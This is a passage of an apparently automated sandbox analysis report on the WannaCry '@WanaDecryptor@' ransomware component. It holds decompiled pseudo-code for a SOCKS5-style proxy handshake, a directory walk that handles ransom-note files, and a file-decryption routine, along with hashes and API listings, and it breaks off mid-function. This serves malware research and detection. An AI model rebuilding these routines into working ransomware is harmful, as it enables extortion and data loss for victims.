                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #6197ClientRect
                                  • String ID:
                                  • API String ID: 2663203813-0
                                  • Opcode ID: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                  • Instruction ID: 12e2120aa947bc0da8521fdfe4b738009e277cbc90461cf2c188bbd8c1c7c24c
                                  • Opcode Fuzzy Hash: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                  • Instruction Fuzzy Hash: 60F01776700B01AFE214DA28C846F6BF7E9FBD4600F00891EB981D7290D6B0F8158A95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
                                  				void* _v0;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				char _v266;
                                  				char _v267;
                                  				char _v268;
                                  				char _v272;
                                  				char _v280;
                                  				char _v282;
                                  				signed int _v283;
                                  				char _v284;
                                  				void _v287;
                                  				void _v288;
                                  				char _v289;
                                  				char _v290;
                                  				char _v291;
                                  				char _v292;
                                  				signed int _v296;
                                  				char _v304;
                                  				char _v312;
                                  				char _v313;
                                  				signed int _v315;
                                  				char _v323;
                                  				signed int _v324;
                                  				signed int _t58;
                                  				signed int _t65;
                                  				signed int* _t66;
                                  				void* _t71;
                                  				void* _t74;
                                  				void* _t86;
                                  				signed int* _t87;
                                  				void _t89;
                                  				signed int _t111;
                                  				signed int _t112;
                                  				signed int _t117;
                                  				void* _t127;
                                  				void* _t132;
                                  				void* _t141;
                                  				intOrPtr _t143;
                                  
                                  				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
                                  				if(_t58 != 0) {
                                  					L24:
                                  					return _t58 | 0xffffffff;
                                  				} else {
                                  					_t141 = _v0;
                                  					_t89 = 0;
                                  					_v272 = 0;
                                  					if(_a8 != 0) {
                                  						asm("repne scasb");
                                  						_t89 = 1;
                                  						_v272 = 1;
                                  					}
                                  					_v268 = 5;
                                  					_v267 = 1;
                                  					_v266 = 0;
                                  					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
                                  					if(_t58 < 0) {
                                  						L22:
                                  						_t143 = _a4;
                                  						if(_t143 > 0) {
                                  							__imp__#3(_t143); // executed
                                  						}
                                  						goto L24;
                                  					} else {
                                  						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
                                  						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
                                  							goto L22;
                                  						} else {
                                  							_v292 = 5;
                                  							_v291 = 1;
                                  							_v290 = 0;
                                  							if(_v16 == 0) {
                                  								_v289 = 1;
                                  								_v288 =  *_t141;
                                  								_t65 = _v20;
                                  								_v283 = _t65;
                                  								_v284 = _t65 >> 8;
                                  								_t66 =  &_v282;
                                  							} else {
                                  								_v289 = 3;
                                  								_t111 = _v296 & 0x000000ff;
                                  								_v288 = _t89;
                                  								_t112 = _t111 >> 2;
                                  								memcpy( &_v287, _t141, _t112 << 2);
                                  								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
                                  								_t117 = _v20;
                                  								 *_t86 = _t117 >> 8;
                                  								_t87 = _t86 + 1;
                                  								 *_t87 = _t117;
                                  								_t66 =  &(_t87[0]);
                                  							}
                                  							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
                                  							if(_t58 < 0) {
                                  								goto L22;
                                  							} else {
                                  								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
                                  								if(_t58 < 0) {
                                  									goto L22;
                                  								} else {
                                  									_t58 = _v315;
                                  									if(_t58 != 0) {
                                  										goto L22;
                                  									} else {
                                  										_t71 = _v313 - 1;
                                  										if(_t71 == 0) {
                                  											_t127 = _v0;
                                  											_push(6);
                                  											goto L19;
                                  										} else {
                                  											_t74 = _t71 - 2;
                                  											if(_t74 == 0) {
                                  												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
                                  												_t127 = _v0;
                                  												_push((_v324 & 0x000000ff) + 2);
                                  												_push( &_v323);
                                  												_push(_a4);
                                  												goto L20;
                                  											} else {
                                  												if(_t74 != 1) {
                                  													L21:
                                  													return 0;
                                  												} else {
                                  													_t127 = _v0;
                                  													_push(0x12);
                                  													L19:
                                  													_push( &_v312);
                                  													_push(_a4);
                                  													L20:
                                  													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
                                  													if(_t58 < 0) {
                                  														goto L22;
                                  													} else {
                                  														goto L21;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                  • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004068E0(intOrPtr _a4) {
                                  				intOrPtr _t5;
                                  				intOrPtr _t8;
                                  				intOrPtr _t9;
                                  
                                  				_t5 = _a4;
                                  				_t8 =  *((intOrPtr*)(_t5 + 4));
                                  				if(_t8 != 0x100) {
                                  					if(_t8 != 0x104 ||  *((intOrPtr*)(_t5 + 8)) != 0x73) {
                                  						goto L7;
                                  					} else {
                                  						return 1;
                                  					}
                                  				} else {
                                  					_t9 =  *((intOrPtr*)(_t5 + 8));
                                  					if(_t9 == 0xd || _t9 == 0x1b) {
                                  						return 1;
                                  					} else {
                                  						L7:
                                  						_push(_t5); // executed
                                  						L00412CB6(); // executed
                                  						return _t5;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5280
                                  • String ID:
                                  • API String ID: 2434734067-0
                                  • Opcode ID: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                  • Instruction ID: 7c996b979d0e86874aef4d69ce28bf61b51dac78b1e0fd433df73bfd4df6564a
                                  • Opcode Fuzzy Hash: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                  • Instruction Fuzzy Hash: 45E0B6B97011008AEA20CB04C294A5FA292A7E0714F76C077E1899BAA9C27DCDE1CA1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                  • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                  • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
                                  				void* _t109;
                                  				intOrPtr* _t110;
                                  				int _t111;
                                  				void* _t115;
                                  				intOrPtr* _t116;
                                  				intOrPtr* _t123;
                                  				intOrPtr _t124;
                                  				char _t125;
                                  				intOrPtr* _t129;
                                  				intOrPtr* _t131;
                                  				intOrPtr* _t135;
                                  				int _t139;
                                  				int _t145;
                                  				int _t146;
                                  				int _t147;
                                  				int _t149;
                                  				int _t154;
                                  				intOrPtr* _t221;
                                  				void _t225;
                                  				intOrPtr* _t226;
                                  				wchar_t* _t227;
                                  				intOrPtr* _t228;
                                  				intOrPtr* _t229;
                                  				void* _t231;
                                  				void* _t232;
                                  				intOrPtr _t234;
                                  				void* _t235;
                                  				void* _t236;
                                  				void* _t237;
                                  				void* _t238;
                                  				void* _t239;
                                  				void* _t240;
                                  				void* _t242;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041356E);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t234;
                                  				_t235 = _t234 - 0x56c;
                                  				_t232 = __ecx;
                                  				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                  				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                  				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                  				 *(_t235 + 0x584) = 0;
                                  				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                  				 *((char*)(_t235 + 0x588)) = 1;
                                  				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                  				_t236 = _t235 + 0xc;
                                  				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                  				 *(_t236 + 0x18) = _t109;
                                  				if(_t109 != 0xffffffff) {
                                  					while(1) {
                                  						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  						if(_t110 != 0 &&  *_t110 != 0) {
                                  							break;
                                  						}
                                  						_t111 = wcscmp(_t236 + 0x358, ".");
                                  						_t236 = _t236 + 8;
                                  						if(_t111 != 0) {
                                  							_t139 = wcscmp(_t236 + 0x358, L"..");
                                  							_t236 = _t236 + 8;
                                  							if(_t139 != 0) {
                                  								_push(_t236 + 0x358);
                                  								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                  								_t236 = _t236 + 0x10;
                                  								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                  									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                  									_t236 = _t236 + 8;
                                  									if(_t145 != 0) {
                                  										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                  										_t236 = _t236 + 8;
                                  										if(_t146 != 0) {
                                  											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                  											_t236 = _t236 + 8;
                                  											if(_t147 != 0) {
                                  												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  												_t149 = wcslen(_t236 + 0x5c);
                                  												_t236 = _t236 + 4;
                                  												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                  												 *((char*)(_t236 + 0x590)) = 3;
                                  												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                  												 *((char*)(_t236 + 0x584)) = 1;
                                  												_push(1);
                                  												goto L14;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                  										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  										_t154 = wcslen(_t236 + 0x5c);
                                  										_t236 = _t236 + 4;
                                  										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                  										 *((char*)(_t236 + 0x590)) = 2;
                                  										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                  										 *((char*)(_t236 + 0x584)) = 1;
                                  										_push(1);
                                  										L14:
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					FindClose( *(_t236 + 0x20));
                                  					_t115 =  *(_t236 + 0x18);
                                  					_t225 =  *_t115;
                                  					if(_t225 != _t115) {
                                  						while(1) {
                                  							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t135 != 0 &&  *_t135 != 0) {
                                  								goto L22;
                                  							}
                                  							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                  							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                  								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E00402560(_t232, _t136);
                                  							_t225 =  *_t225;
                                  							if(_t225 !=  *(_t236 + 0x18)) {
                                  								continue;
                                  							}
                                  							goto L22;
                                  						}
                                  					}
                                  					L22:
                                  					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                  					_t226 =  *_t116;
                                  					if(_t226 != _t116) {
                                  						while(1) {
                                  							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t131 != 0 &&  *_t131 != 0) {
                                  								goto L28;
                                  							}
                                  							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                  							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                  								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E004026B0(_t232, _t132);
                                  							_t226 =  *_t226;
                                  							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                  								continue;
                                  							}
                                  							goto L28;
                                  						}
                                  					}
                                  					L28:
                                  					_t227 =  *(_t236 + 0x58c);
                                  					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                  					_t237 = _t236 + 0x10;
                                  					DeleteFileW(_t237 + 0x5c);
                                  					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                  					_t238 = _t237 + 0x10;
                                  					DeleteFileW(_t238 + 0x5c);
                                  					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					 *((char*)(_t238 + 0x584)) = 0;
                                  					_t221 = _t123;
                                  					_t228 =  *_t123;
                                  					if(_t228 != _t123) {
                                  						do {
                                  							_t129 = _t228;
                                  							_t228 =  *_t228;
                                  							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                  						} while (_t228 != _t221);
                                  						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					}
                                  					_push(_t123);
                                  					L00412C98();
                                  					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                  					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                  					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                  					_t239 = _t238 + 4;
                                  					_t124 =  *_t229;
                                  					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                  					if(_t124 != _t229) {
                                  						do {
                                  							_push(0);
                                  							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                  						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                  					}
                                  					_push( *((intOrPtr*)(_t239 + 0x28)));
                                  					L00412C98();
                                  					_t240 = _t239 + 4;
                                  					_t125 = 1;
                                  				} else {
                                  					 *((char*)(_t236 + 0x57c)) = 0;
                                  					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                  					_push( *((intOrPtr*)(_t236 + 0x10)));
                                  					L00412C98();
                                  					_t242 = _t236 + 4;
                                  					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                  					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                  					_push( *((intOrPtr*)(_t242 + 0x20)));
                                  					L00412C98();
                                  					_t240 = _t242 + 4;
                                  					_t125 = 0;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                  				return _t125;
                                  			}


                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                  				struct _OVERLAPPED* _v8;
                                  				char _v20;
                                  				long _v32;
                                  				long _v36;
                                  				union _LARGE_INTEGER* _v40;
                                  				void _v44;
                                  				char _v48;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v564;
                                  				union _LARGE_INTEGER* _v568;
                                  				void _v572;
                                  				char _v573;
                                  				short _v575;
                                  				intOrPtr _v579;
                                  				void _v580;
                                  				struct _FILETIME _v588;
                                  				struct _FILETIME _v596;
                                  				struct _FILETIME _v604;
                                  				void* _v608;
                                  				void _v612;
                                  				void _v616;
                                  				void* _v620;
                                  				intOrPtr _v624;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				int _t109;
                                  				int _t113;
                                  				int _t115;
                                  				int _t116;
                                  				int _t118;
                                  				void* _t119;
                                  				signed int _t122;
                                  				signed int _t137;
                                  				signed int _t139;
                                  				int _t140;
                                  				signed int _t141;
                                  				int _t145;
                                  				signed int _t148;
                                  				int _t152;
                                  				int _t155;
                                  				void* _t159;
                                  				intOrPtr _t196;
                                  				signed int _t212;
                                  				signed int _t213;
                                  				void* _t216;
                                  				intOrPtr _t223;
                                  				signed int _t224;
                                  				void* _t226;
                                  				intOrPtr _t227;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x4158c8);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t227;
                                  				_push(_t212);
                                  				_v624 = __ecx;
                                  				_t213 = _t212 | 0xffffffff;
                                  				_v620 = _t213;
                                  				_v608 = _t213;
                                  				_v48 = 0;
                                  				_v616 = 0;
                                  				_v580 = 0;
                                  				_v579 = 0;
                                  				_v575 = 0;
                                  				_v573 = 0;
                                  				_v612 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v564 = 0;
                                  				_v8 = 0;
                                  				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v620 = _t159;
                                  				if(_t159 != _t213) {
                                  					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                  					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                  					__eflags = _t109;
                                  					if(_t109 == 0) {
                                  						L32:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L33;
                                  					} else {
                                  						__eflags = 0;
                                  						asm("repe cmpsd");
                                  						if(0 != 0) {
                                  							goto L32;
                                  						} else {
                                  							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                  							__eflags = _t113;
                                  							if(_t113 == 0) {
                                  								goto L32;
                                  							} else {
                                  								__eflags = _v616 - 0x100;
                                  								if(_v616 != 0x100) {
                                  									goto L32;
                                  								} else {
                                  									_t223 = _v624;
                                  									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                  									__eflags = _t115;
                                  									if(_t115 == 0) {
                                  										goto L32;
                                  									} else {
                                  										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                  										__eflags = _t116;
                                  										if(_t116 == 0) {
                                  											goto L32;
                                  										} else {
                                  											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                  											__eflags = _t118;
                                  											if(_t118 == 0) {
                                  												goto L32;
                                  											} else {
                                  												__eflags = _v612 - 3;
                                  												if(_v612 != 3) {
                                  													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                  													_t216 = _t119;
                                  													_v608 = _t216;
                                  													__eflags = _t216 - 0xffffffff;
                                  													if(_t216 != 0xffffffff) {
                                  														_push( &_v48);
                                  														_push( &_v560);
                                  														_t51 = _t223 + 4; // 0x4
                                  														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                  														__eflags = _t122;
                                  														if(_t122 != 0) {
                                  															L22:
                                  															_t59 = _t223 + 0x54; // 0x54
                                  															_push(0x10);
                                  															_push(_v48);
                                  															_t196 =  *0x4213b0; // 0x4218b0
                                  															_push(_t196);
                                  															_push( &_v560);
                                  															E0040A150(_t59);
                                  															_v44 = _v572;
                                  															_v40 = _v568;
                                  															while(1) {
                                  																__eflags = _v40;
                                  																if(__eflags < 0) {
                                  																	break;
                                  																}
                                  																if(__eflags > 0) {
                                  																	L26:
                                  																	_t139 =  *(_t223 + 0x4d0);
                                  																	__eflags = _t139;
                                  																	if(_t139 == 0) {
                                  																		L28:
                                  																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                  																		__eflags = _t140;
                                  																		if(_t140 == 0) {
                                  																			L34:
                                  																			_push(0xffffffff);
                                  																			_push( &_v20);
                                  																			goto L33;
                                  																		} else {
                                  																			_t141 = _v36;
                                  																			__eflags = _t141;
                                  																			if(_t141 == 0) {
                                  																				goto L34;
                                  																			} else {
                                  																				_v44 = _v44 - _t141;
                                  																				asm("sbb dword [ebp-0x24], 0x0");
                                  																				_t76 = _t223 + 0x54; // 0x54
                                  																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                  																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
